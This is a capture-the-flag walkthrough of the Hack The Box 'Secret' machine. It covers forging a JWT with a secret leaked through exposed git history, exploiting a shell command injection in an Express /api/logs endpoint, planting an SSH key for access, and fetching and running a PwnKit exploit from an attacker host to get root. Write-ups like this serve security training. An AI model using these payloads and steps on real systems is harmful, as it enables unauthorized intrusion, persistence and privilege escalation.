[Hack The Box] HTB—Secret walkthrough
machine: Hack The Box—Secret
HTB—Secret
I. Information gathering
nmap
nmap -sV 10.10.11.120
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open http nginx 1.18.0 (Ubuntu)
3000/tcp open http Node.js (Express middleware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Deeper scan of the open ports
nmap -sC -sV -n -T5 -p 22,80,3000 10.10.11.120
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 97:af:61:44:10:89:b9:53:f0:80:3f:d7:19:b1:e2:9c (RSA)
| 256 95:ed:65:8d:cd:08:2b:55:dd:17:51:31:1e:3e:18:12 (ECDSA)
|_ 256 33:7b:c1:71:d3:33:0f:92:4e:83:5a:1f:52:02:93:5e (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-title: DUMB Docs
|_http-server-header: nginx/1.18.0 (Ubuntu)
3000/tcp open http Node.js (Express middleware)
|_http-title: DUMB Docs
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
II. Web exploitation
Following the API docs on the site, register a user with curl
curl -i -X POST \
-H 'Content-Type: application/json' \
-d '{"name":"xiaozz", "email":"xiaoz@dasith.works", "password":"xiaoz1234"}' \
http://10.10.11.120:3000/api/user/register
Log in
curl -i -X POST \
-H 'Content-Type: application/json' \
-d '{"email":"xiaoz@dasith.works", "password":"xiaoz1234"}' \
http://10.10.11.120:3000/api/user/login
auth-token: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJfaWQiOiI2MjE2ZWM3NmQ1NzVhNDA0NWM5MTAzMTEiLCJuYW1lIjoieGlhb3p6IiwiZW1haWwiOiJ4aWFvekBkYXNpdGgud29ya3MiLCJpYXQiOjE2NDU2Njk2NDZ9.dQlJD5uraui5jzOJRvqdJ_5c4PARMhbYbMW-pAz4Ixs
Authentication
1. JWT forgery
We need admin privileges, so try forging the JWT (jwt.io). The token is HS256, so whoever holds the signing secret can mint any claims.
Found a key in .env:
DB_CONNECT = 'mongodb://127.0.0.1:27017/auth-web'
TOKEN_SECRET = secret
That is not the real one, though: a .git directory is also exposed, so recover the history from it. A handy tool for this is gakki429/Git_Extract (extracts a leaked remote .git or a local one; on github.com)
python2 git_extract.py ../.git
The git history holds the real TOKEN_SECRET:
DB_CONNECT = 'mongodb://127.0.0.1:27017/auth-web'
TOKEN_SECRET = gXr67TtoQL8TShUc8XYsK2HvsBYfyQSFCFZe4MQp7gRpFuMkKjcM72CNQN4fMfbZEKx4i7YiWuNAkmuTcdEriCMm9vPAYkhpwPTiuVwVhvwE
Now look at the related code, local-web\routes\private.js
// local-web/routes/private.js, the /logs handler. The three requires are the
// ones this handler needs; the verifytoken path is as assumed here.
const router = require('express').Router();
const { exec } = require('child_process');
const verifytoken = require('./verifytoken');   // the app's JWT-checking middleware

router.get('/logs', verifytoken, (req, res) => {
    const file = req.query.file;                // attacker-controlled query parameter
    const userinfo = { name: req.user }         // req.user = the decoded JWT claims
    const name = userinfo.name.name;            // "name" claim from the token

    if (name == 'theadmin'){
        // file is interpolated unsanitized into a shell command line
        const getLogs = `git log --oneline ${file}`;
        exec(getLogs, (err , output) =>{        // exec() runs the string via /bin/sh -c
            if(err){
                res.status(500).send(err);
                return
            }
            res.json(output);                   // command output comes back in the response
        })
    }
    else{
        res.json({
            role: {
                role: "you are normal user",
                desc: userinfo.name.name
            }
        })
    }
})

module.exports = router;
The only check is name == 'theadmin', so the JWT's name claim has to be theadmin.
Modify the JWT
The admin JWT (same _id and iat as our own token, name and email changed, re-signed with the leaked TOKEN_SECRET):
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJfaWQiOiI2MjE2ZWM3NmQ1NzVhNDA0NWM5MTAzMTEiLCJuYW1lIjoidGhlYWRtaW4iLCJlbWFpbCI6InRoZWFkbWluQGRhc2l0aC53b3JrcyIsImlhdCI6MTY0NTY2OTY0Nn0.La5fUzvIGE9T_ibOX37_D_ImqzR3fW6RjGMcr4wiRW4
Logged in as admin successfully; with this token, visit http://10.10.11.120:3000/api/logs
2. Command execution
const getLogs = `git log --oneline ${file}`;
This line in private.js gives command execution: file comes straight from the query string and is interpolated into a shell command line, so a ; ends the git command and starts ours (send the forged auth-token header with the request)
http://10.10.11.120:3000/api/logs?file=123;whoami;
The reverse shell failed; other writeups write an SSH public key instead (looking at /etc/passwd, the user the app runs as has a login shell)
curl -i \
-H 'auth-token:eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJfaWQiOiI2MjE2ZWM3NmQ1NzVhNDA0NWM5MTAzMTEiLCJuYW1lIjoidGhlYWRtaW4iLCJlbWFpbCI6InRoZWFkbWluQGRhc2l0aC53b3JrcyIsImlhdCI6MTY0NTY2OTY0Nn0.La5fUzvIGE9T_ibOX37_D_ImqzR3fW6RjGMcr4wiRW4' \
'http://10.10.11.120/api/logs?file=index.js;id;cat+/etc/passwd' | sed 's/\\n/\n/g'
The sed 's/\\n/\n/g' turns the escaped \n sequences in the JSON response into real line breaks
3. Write an SSH public key
On the Kali attack box:
ssh-keygen -t rsa                    # generate a key pair on the attacker machine; leave the passphrase empty
cd /root/.ssh
export PUBLIC_KEY=$(cat id_rsa.pub)  # store the public key in a shell variable
Then run these on the target through the injection:
mkdir -p /home/dasith/.ssh
echo $PUBLIC_KEY >> /home/dasith/.ssh/authorized_keys
curl
# -i shows the response headers; -G sends the data as a GET query string;
# --data-urlencode URL-encodes the payload. $PUBLIC_KEY is expanded by the local
# shell inside the double quotes, so the key text itself travels in the file= parameter.
curl -i \
  -H 'auth-token:eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJfaWQiOiI2MjE2ZWM3NmQ1NzVhNDA0NWM5MTAzMTEiLCJuYW1lIjoidGhlYWRtaW4iLCJlbWFpbCI6InRoZWFkbWluQGRhc2l0aC53b3JrcyIsImlhdCI6MTY0NTY2OTY0Nn0.La5fUzvIGE9T_ibOX37_D_ImqzR3fW6RjGMcr4wiRW4' \
  -G \
  --data-urlencode "file=123;mkdir -p /home/dasith/.ssh;echo $PUBLIC_KEY >> /home/dasith/.ssh/authorized_keys" \
  'http://10.10.11.120/api/logs'
SSH login
ssh dasith@10.10.11.120
Got the user flag
III. Privilege escalation
As usual, run linpeas.sh
It reports CVE-2021-4034, the pkexec (PwnKit) local privilege escalation
Start an HTTP server on the attack box:
python3 -m http.server 8080
Fetch the exploit files on the target:
wget http://10.10.14.25:8080/Makefile
wget http://10.10.14.25:8080/cve-2021-4034.c
wget http://10.10.14.25:8080/pwnkit.c
make
./cve-2021-4034
Got the root flag
Reference writeup:
https://drt.sh/posts/htb-secret/